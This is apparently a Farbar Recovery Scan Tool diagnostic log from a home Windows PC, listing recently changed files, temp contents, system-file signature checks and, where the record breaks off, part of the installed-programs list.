2014-07-05 13:36 - 2012-01-16 12:34 - 00014104 _____ () C:\Users\Ric\Documents\Knott Template trivia3 GOOD TO GO.xlsx
2014-07-05 13:36 - 2012-01-16 12:29 - 00013848 _____ () C:\Users\Ric\Documents\Knott Template trivia2.xlsx
2014-07-05 13:36 - 2012-01-16 11:55 - 00012056 _____ () C:\Users\Ric\Documents\Knott Template trivia.xlsx
2014-07-05 13:36 - 2011-08-22 18:43 - 00001304 _____ () C:\Users\Ric\Documents\Karaokesongrequestslip.txt
2014-07-05 13:36 - 2011-03-09 16:47 - 01051928 _____ () C:\Users\Ric\Documents\Karaoke text file.txt
2014-07-05 13:35 - 2014-01-24 11:53 - 51149806 _____ () C:\Users\Ric\Documents\GROWING UP BOOMER final Georgia Club.pptx
2014-07-05 13:35 - 2011-08-18 15:58 - 00001304 _____ () C:\Users\Ric\Documents\Karaoke song request slip.txt
2014-07-05 13:34 - 2014-01-24 12:52 - 51149780 _____ () C:\Users\Ric\Documents\GROWING UP BOOMER final Georgia Club extra.pptx
2014-07-05 13:33 - 2013-08-08 11:06 - 00001560 _____ () C:\Users\Ric\Documents\Game Show 5 Ric 3-2.txt
2014-07-05 13:32 - 2013-03-20 08:02 - 00010520 _____ () C:\Users\Ric\Documents\Disney Family Feud.xlsx
2014-07-05 13:32 - 2013-01-28 13:20 - 03211800 _____ () C:\Users\Ric\Documents\Ethics in Education.ppt
2014-07-05 13:32 - 2012-06-16 18:45 - 00015640 _____ () C:\Users\Ric\Documents\FATHER'SDAYSONGS.xls
2014-07-05 13:32 - 2012-02-16 10:48 - 00154136 _____ () C:\Users\Ric\Documents\Fast Money Round 2.xls
2014-07-05 13:32 - 2012-02-16 10:42 - 00032792 _____ () C:\Users\Ric\Documents\Fast Money Round.xls
2014-07-05 13:29 - 2012-06-11 17:12 - 00023064 _____ () C:\Users\Ric\Documents\CALENDARCLASSICS.xls
2014-07-05 13:29 - 2011-04-27 12:43 - 07028992 _____ () C:\Users\Ric\Documents\Bring a tear to my eye.wmv
2014-07-05 13:29 - 2011-02-26 20:26 - 11796504 _____ () C:\Users\Ric\Documents\capture.avi
2014-07-04 13:32 - 2014-07-04 13:27 - 20787200 _____ () C:\Users\Ric\qdata2010.QDF
2014-07-04 13:32 - 2011-02-28 08:03 - 00000000 ____D () C:\Users\Ric\BACKUP
2014-07-04 13:28 - 2014-07-04 04:19 - 20787200 _____ () C:\Users\Ric\Downloads\qdata2010 (1).qdf
2014-07-04 13:24 - 2014-07-04 04:24 - 00001120 _____ () C:\Users\Ric\Downloads\qdata2010 (1)OFXLOG.DAT
2014-07-04 04:56 - 2013-05-19 16:06 - 00039448 _____ () C:\Users\Ric\Documents\Belize The Top English Speaking Retirement Haven in the Caribbean.txt
2014-07-04 04:33 - 2013-03-21 13:45 - 03414552 _____ () C:\Users\Ric\Documents\ABCs.pps
2014-07-04 04:19 - 2014-07-04 04:19 - 20780389 _____ () C:\Users\Ric\Downloads\qdata2010 (2).qdf
2014-07-02 07:15 - 2014-07-02 07:15 - 00003288 _____ () C:\bootsqm.dat
2014-07-02 02:01 - 2014-06-05 11:17 - 00000000 ____D () C:\Users\Ric\AppData\Local\UQmedia
2014-07-01 22:43 - 2012-01-30 10:19 - 00054296 _____ () C:\Users\Ric\Desktop\Knott excel test.xlsx
2014-07-01 22:20 - 2014-05-15 09:09 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\DropboxMaster
2014-07-01 15:37 - 2013-05-23 17:24 - 00000000 ____D () C:\ProgramData\CanonIJPLM
2014-07-01 15:28 - 2014-06-25 19:23 - 20742144 _____ () C:\Users\Ric\Downloads\qdata2010.qdf
2014-07-01 15:27 - 2014-06-25 19:23 - 00000896 _____ () C:\Users\Ric\Downloads\qdata2010OFXLOG.DAT
2014-06-25 20:50 - 2014-06-25 20:26 - 00000961 ____H () C:\IPH.PH
2014-06-25 20:50 - 2011-02-26 14:14 - 00094197 _____ () C:\install.log
2014-06-25 20:20 - 2014-06-25 20:20 - 00208400 _____ (AOL LLC.) C:\Users\Ric\Downloads\AOLDNLD.exe
2014-06-25 20:13 - 2011-02-26 00:37 - 00002503 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Safari.lnk
2014-06-25 20:02 - 2014-06-25 19:54 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Feeqvena
2014-06-25 19:30 - 2014-06-25 19:29 - 00369792 _____ () C:\Windows\Minidump\062514-34335-01.dmp
2014-06-25 19:22 - 2011-04-27 15:24 - 00463200 _____ () C:\Users\Ric\qdata2010OFXLOG.DAT
2014-06-24 13:11 - 2011-08-28 11:40 - 00003866 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA
2014-06-24 13:11 - 2011-08-28 11:40 - 00003470 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core
2014-06-24 13:10 - 2013-10-06 14:24 - 00003888 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-06-24 13:10 - 2013-10-06 14:24 - 00003636 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-06-23 19:05 - 2014-06-23 19:04 - 00370536 _____ () C:\Windows\Minidump\062314-33337-01.dmp
2014-06-20 21:40 - 2011-02-27 19:48 - 00000000 ____D () C:\ProgramData\Roxio
2014-06-20 21:32 - 2014-06-20 21:32 - 00000000 ____D () C:\Users\Ric\Documents\Roxio Projects
2014-06-19 10:21 - 2014-06-13 11:10 - 00000000 ____D () C:\Users\Ric\AppData\Local\Adobe
2014-06-18 16:45 - 2014-06-18 16:44 - 01051112 _____ () C:\Users\Ric\Documents\Divorce Civi lCover Sheet.zip
2014-06-18 16:32 - 2014-06-18 16:31 - 00378088 _____ () C:\Windows\Minidump\061814-37799-01.dmp
2014-06-18 16:20 - 2014-06-18 16:20 - 00262144 _____ () C:\Windows\Minidump\061814-48672-01.dmp
2014-06-18 09:49 - 2014-06-18 09:49 - 00000000 ____D () C:\ProgramData\Package Cache
2014-06-18 09:48 - 2014-06-18 09:48 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-06-18 09:47 - 2014-06-18 09:47 - 00000000 ____D () C:\AMD
2014-06-18 09:40 - 2014-06-18 09:39 - 00569856 _____ () C:\Windows\Minidump\061814-35069-01.dmp
2014-06-17 16:55 - 2014-06-17 16:54 - 00369840 _____ () C:\Windows\Minidump\061714-74116-01.dmp
2014-06-17 16:43 - 2014-06-17 16:42 - 00369808 _____ () C:\Windows\Minidump\061714-29546-01.dmp
2014-06-16 17:22 - 2011-02-25 21:53 - 00000000 ____D () C:\Users\Ric\AppData\Local\Deployment
2014-06-16 17:09 - 2014-06-16 17:08 - 00275760 _____ () C:\Windows\Minidump\061614-35178-01.dmp
2014-06-16 09:54 - 2014-06-16 09:54 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\WMCore
2014-06-16 09:53 - 2014-06-16 09:53 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\WirelessManager
2014-06-16 09:50 - 2011-05-12 18:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DigiGames
2014-06-16 09:48 - 2011-05-12 18:05 - 00000000 ____D () C:\Trivia Production Suite Data
2014-06-16 09:43 - 2014-06-16 09:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel® Matrix Storage Manager
2014-06-16 09:40 - 2011-02-25 23:22 - 00021886 _____ () C:\Windows\DPINST.LOG
2014-06-16 09:39 - 2014-06-16 09:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Wireless
2014-06-16 09:38 - 2014-06-16 09:38 - 00000000 ____D () C:\Windows\Dell
2014-06-16 09:38 - 2014-06-16 09:38 - 00000000 ____D () C:\Program Files (x86)\QUALCOMM
2014-06-16 09:37 - 2011-02-25 22:58 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-06-16 09:36 - 2014-06-16 09:36 - 00000000 ____D () C:\ProgramData\Novatel Wireless
2014-06-16 09:36 - 2014-06-16 09:24 - 00000000 ____D () C:\Users\Ric\New folder
2014-06-16 09:36 - 2012-01-17 12:24 - 00000000 ____D () C:\Users\Ric\AppData\Local\Downloaded Installations
2014-06-16 09:30 - 2014-06-16 09:30 - 00002310 _____ () C:\Users\Public\Desktop\Dell Mobile Broadband Manager.lnk
2014-06-16 09:21 - 2013-10-06 14:25 - 00002183 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-06-16 09:20 - 2014-06-16 09:18 - 00000000 ____D () C:\Program Files\IDT
2014-06-16 09:18 - 2014-06-16 09:18 - 00000000 ____D () C:\Windows\system32\SRSLabs
2014-06-16 09:14 - 2014-06-16 09:09 - 00000000 ____D () C:\temp
2014-06-16 09:12 - 2014-06-16 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2014-06-16 09:12 - 2014-06-16 09:12 - 00000000 ____D () C:\Program Files\My Dell
2014-06-16 09:12 - 2011-05-25 13:26 - 00000000 ____D () C:\Program Files\Dell Support Center
2014-06-16 09:12 - 2011-02-26 00:09 - 00000000 ____D () C:\ProgramData\PCDr
2014-06-16 09:11 - 2012-08-23 06:39 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell Support Center
2014-06-16 09:11 - 2011-02-25 21:58 - 00000000 ____D () C:\ProgramData\Dell
2014-06-16 08:57 - 2014-06-16 08:57 - 00000000 ____D () C:\Users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell

Files to move or delete:
====================
C:\Users\Ric\qdata2010OFXLOG.DAT
C:\Users\Ric\qdata2010_OldSyncLog.dat
C:\Users\Ric\qdata2010_SyncLog.dat

Some content of TEMP:
====================
C:\Users\Ric\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpwjih6l.dll
C:\Users\Ric\AppData\Local\Temp\Quarantine.exe
C:\Users\Ric\AppData\Local\Temp\uninst.dll

==================== Bamital & volsnap Check =================

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-07-06 10:27

==================== End Of Log ============================

ADDITION.TXT

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 15-07-2014 01
Ran by Ric at 2014-07-16 11:10:16
Running from C:\Users\Ric\Desktop
Boot Mode: Normal
==========================================================

==================== Security Center ========================

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

AC3Filter 1.63b (HKLM-x32\...\AC3Filter_is1) (Version: 1.63b - Alexander Vigovsky)
Adobe After Effects CS5 Third Party Content (HKLM-x32\...\{C0AA232E-BD1B-40B5-A176-A2BEB67FFAE1}) (Version: 10 - Adobe Systems Incorporated)
Adobe After Effects CS5 Third Party Royalty Content (HKLM-x32\...\{CD29B5CA-4727-4114-9AD9-25CCCE6E4014}) (Version: 10 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 14.0.0.110 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 14.0.0.110 - Adobe Systems Incorporated) Hidden
Adobe Audition 3.0 (HKLM-x32\...\Adobe Audition 3.0) (Version: 3.0 - Adobe Systems Incorporated)
Adobe Audition 3.0 (x32 Version: 3.0 - Adobe Systems Incorporated) Hidden
Adobe Audition 3.0 Vista Compatibility (HKLM\...\{75d2897c-87aa-4a06-8710-3ebda9f02de0}.sdb) (Version:  - )
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.3.0.800 - Adobe Systems Incorporated)
Adobe Community Help (x32 Version: 3.3.0 - Adobe Systems Incorporated) Hidden
Adobe Creative Suite 5 Master Collection (HKLM-x32\...\{288DB08D-0708-4A94-B055-55B99E39EB62}) (Version: 5.0 - Adobe Systems Incorporated)
Adobe Encore CS5 Third Party Royalty Content (HKLM-x32\...\{0E3C6C75-872D-4B0D-B0B2-31C717250691}) (Version: 5.0.0 - Adobe Systems Incorporated)
Adobe Flash Player 13 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 13.0.0.214 - Adobe Systems Incorporated)
Adobe Flash Player 14 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 14.0.0.125 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Media Player (x32 Version: 1.8 - Adobe Systems Incorporated) Hidden
Adobe OnLocation CS5 Royalty Content (HKLM-x32\...\{7816FDDE-40D4-482D-AD7D-97858985DB3E}) (Version: 5.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CS5 Third Party Royalty Content (HKLM-x32\...\{4BD0D94C-C5CA-41CA-879B-928E55ADA18F}) (Version: 5.0.3 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Adobe Soundbooth CS5 Codecs (HKLM-x32\...\{DE5DE662-2ECB-4D93-967B-221FBCC8A736}) (Version: 3.0 - Adobe Systems Incorporated)
Adobe Soundbooth CS5 Royalty Codecs (HKLM-x32\...\{F319804F-E3A4-4C02-8AEC-CB39A4F6447E}) (Version: 3.0 - Adobe Systems Incorporated)
Advanced Audio FX Engine (HKLM-x32\...\Advanced Audio FX Engine) (Version: 1.12.05 - Creative Technology Ltd)
Amazon MP3 Downloader 1.0.17 (HKLM-x32\...\Amazon MP3 Downloader) (Version: 1.0.17 - Amazon Services LLC)
Amazon MP3 Uploader (HKLM-x32\...\com.amazon.music.uploader) (Version: 1.0.6 - Amazon Services LLC)
Amazon MP3 Uploader (x32 Version: 1.0.6 - Amazon Services LLC) Hidden
Amazon Music (HKCU\...\Amazon Amazon Music) (Version: 3.0.0.564 - Amazon Services LLC)
AnswerWorks 5.0 English Runtime (HKLM-x32\...\{DBCC73BA-C69A-4BF5-B4BF-F07501EE7039}) (Version: 5.0.7 - Vantage Software Technologies)
AOL Toolbar (HKCU\...\AOL Toolbar) (Version:  - )
AOL Uninstaller (Choose which Products to Remove) (HKLM-x32\...\AOL Uninstaller) (Version:  - AOL Inc.)
Apple Application Support (HKLM-x32\...\{D9DAD0FF-495A-472B-9F10-BAE430A26682}) (Version: 3.0.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ArcSoft Panorama Maker 6 (HKLM-x32\...\{DABFD34E-BE68-4BC6-9254-5D7A7FF76B99}) (Version: 6.0.8.85 - ArcSoft)
ATI AVIVO64 Codecs (Version: 10.12.0.00122 - ATI Technologies Inc.) Hidden
Audience Poll Pro (HKLM-x32\...\Audience Poll Pro_is1) (Version:  - )
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version:  - )
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version:  - ‎Canon Inc.‬)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.1.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version:  - ‪Canon Inc.‬)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version:  - )
Canon MG3200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3200_series) (Version: 1.01 - Canon Inc.)
Canon MG3200 series On-screen Manual (HKLM-x32\...\Canon MG3200 series On-screen Manual) (Version: 7.5.0 - Canon Inc.)
Canon MG3200 series User Registration (HKLM-x32\...\Canon MG3200 series User Registration) (Version:  - Canon Inc.‎)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 1.0.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 1.0.0 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.0.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.0.0 - Canon Inc.)
Carbonite (HKLM-x32\...\Carbonite Backup) (Version: 5.3.1 build 2232 (Aug-29-2012) - Carbonite)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2010.0122.858.16002 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2010.0122.858.16002 - ATI) Hidden
Catalyst Media Center (HKLM-x32\...\{2637C347-9DAD-11D6-9EA2-00055D0CA761}) (Version:  - )
Catalyst Media Center DVD Authoring Module (HKLM-x32\...\{FC4F90EC-B1DA-11D9-9D77-000129760D75}) (Version:  - )
CCC Help Chinese Standard (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Danish (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Dutch (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help English (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Finnish (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help French (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help German (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Italian (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Japanese (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Korean (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Russian (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Spanish (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
CCC Help Swedish (x32 Version: 2010.0122.0857.16002 - ATI) Hidden
ccc-core-static (x32 Version: 2010.0122.858.16002 - ATI) Hidden
ccc-utility64 (Version: 2010.0122.858.16002 - ATI) Hidden
CenturyLink Toolbar (HKLM-x32\...\centurytoolbar) (Version:  - CenturyLink)
Cisco WebEx Meetings (HKCU\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{2A16B95F-7377-410A-B961-EFD9394E1AF3}) (Version:  - Microsoft)
Dell Driver Download Manager (HKCU\...\f031ef6ac137efc5) (Version: 2.1.0.0 - Dell Inc.)
Dell Mobile Broadband Manager (HKLM-x32\...\{23EEC842-57ED-4055-A056-9D4185DFB1AA}) (Version: 6.1.11.3 - Dell)
Dell System Detect (HKCU\...\9204f5692a8faf3b) (Version: 5.8.1.1 - Dell)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 15.0.18.0 - Synaptics Incorporated)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.05 - Creative Technology Ltd)
Dell Wireless HSPA Mini-Card Drivers (HKLM-x32\...\{9D583F01-A973-4B04-90BD-FB7886779090}) (Version: 6.1.13.8 - Dell)
DING! (HKLM-x32\...\{84031A18-BA9A-4156-A74F-E05B52DDFCE2}) (Version: 1.05.005 - Southwest Airlines)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
Dropbox (HKCU\...\Dropbox) (Version: 2.8.2 - Dropbox, Inc.)
eReg (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
Fitbit Connect (HKLM-x32\...\{D3CD091B-296B-48E9-9F0F-E9FE53E02E41}) (Version: 1.0.3.5511 - Fitbit Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 35.0.1916.153 - Google Inc.)
Google Talk Plugin (HKLM-x32\...\{C1E3DFE7-4EAD-3E9E-A826-E06055BA5921}) (Version: 5.4.2.18903 - Google)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.24.15 - Google Inc.) Hidden
Google+ Auto Backup (HKCU\...\Google+ Auto Backup) (Version: 1.0.22.105 - Google, Inc.)
iCloud (HKLM\...\{81E20D41-C277-4526-934D-F2380AF91B78}) (Version: 3.1.0.40 - Apple Inc.)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6267.0 - IDT)
InstallVC90Support (x32 Version: 1.01.0000 - Novatel Wireless) Hidden
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Intel® Turbo Boost Technology Monitor (HKLM\...\{39F4C6F9-618A-4E5B-8FB2-6BD661174E32}) (Version: 1.0.186.6 - Intel)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Internet TV for Windows Media Center (HKLM-x32\...\{9D318C86-AF4C-409F-A6AC-7183FF4CF424}) (Version: 4.2.2.0 - Microsoft Corporation)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
iTunes (HKLM\...\{5A68A656-979F-4168-8795-E2E368AA4DC2}) (Version: 11.2.2.3 - Apple Inc.)
Java Auto Updater (x32 Version: 2.0.6.1 - Sun Microsystems, Inc.) Hidden
Java™ 6 Update 27 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216027FF}) (Version: 6.0.270 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Live! Cam Avatar Creator (HKLM-x32\...\{65D0C510-D7B6-4438-9FC8-E6B91115AB0D}) (Version: 4.6.3009.1 - Creative Technology Ltd)
Logitech SetPoint 6.20 (HKLM\...\sp6) (Version: 6.20.64 - Logitech)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.150.1 - McAfee, Inc.)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Runtime (English) 2007 (HKLM-x32\...\{90120000-001C-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Access Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 32-bit MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Single Image 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Outlook Hotmail Connector 64-bit (HKLM\...\{95140000-007A-0409-1000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft VC9 runtime libraries (x32 Version: 1.0.0 - AOL Inc.) Hidden
Microsoft VC9 runtime libraries (x32 Version: 2.0.0 - AOL Inc.) Hidden
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x86 9.0.30729.4148 (HKLM-x32\...\{002D9D5E-29BA-3E6D-9BC4-3D7D6DBC735C}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
